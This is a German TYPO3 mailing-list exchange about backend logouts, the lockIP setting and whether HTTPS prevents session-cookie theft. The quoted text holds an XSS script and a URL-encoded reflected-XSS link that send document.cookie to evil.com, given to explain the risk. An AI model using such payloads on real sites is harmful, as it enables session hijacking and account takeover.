[TYPO3-german] [TYPO3 german] TYPO3 4.2.6 und 4.3.0alpha2 Logout sofort nach Login im Backend

[Martin Schoenbeck]

Hallo Christian,

Christian Wolff schrieb:

> Hi Martin,
> https ist ist natürlich eine gute maßname. aber man sollte nicht davon
> ausgehen das es das stehelen deines cookies unmöglich macht.

Nein, es verhindert natürlich nur banales mitprotokollieren.

> folgens javascript würde auch trotz https deinen cookie klauen:
> 
> <script>
> new Image().src="https://evil.com/log.php?c="+encodeURI(document.cookie);
> </script>
> 
> 
> vorrausgesetzt jemand schaft es das auf irgend eine weise das auf deiner
> domain zu platzieren.

Klar. Muß er aber eben erstmal schaffen. 

> z.b durch eine extension die URL Parameter wieder auf der seite ausgibt.
> dann könnte eine entsprechende URL den angrif enthalten.

Nur warum sollte er sich dann die Mühe machen, das Cookie zu klauen, wenn
er doch direkt per Javascript meinen Server steuern kann.

> und der angreifer schreibt dir einfach eine mail:
> hey auf deiner seite passiert irgendwas komisches. hier die URL:
> 
> https://www.good.de/index.php?id=13&tx_badExt%5Bdata%5D=%3Cscript%3E+new+Image().src%3D%22http%3A%2F%2Fevil.com%2Flog.cgi%3Fc%3D%22%2BencodeURI(document.cookie)%3B+%3C%2Fscript%3E
> 
> du klickst guten glaubens auf die den link.

Ähm nein. Mach ich nicht. Müßte ich ja einen an der Klatsche haben. Schon
gerade, wenn ich noch eingeloggt bin.

> und das script würde den
> cookie auf evil.com loggen. vorrausgesetzt du warst gerade angemeldet.
> 
> lockIP abzuschalten alleine ist keine sicherheitslück es setzt aber den
> schwierigkeits grad für einen angreifer herunter.

Klar. Sonst hätte man das ja auch nicht extra kodiert.

Gruß Martin
-- 
Bitte nicht an der E-Mail-Adresse fummeln, die paßt so.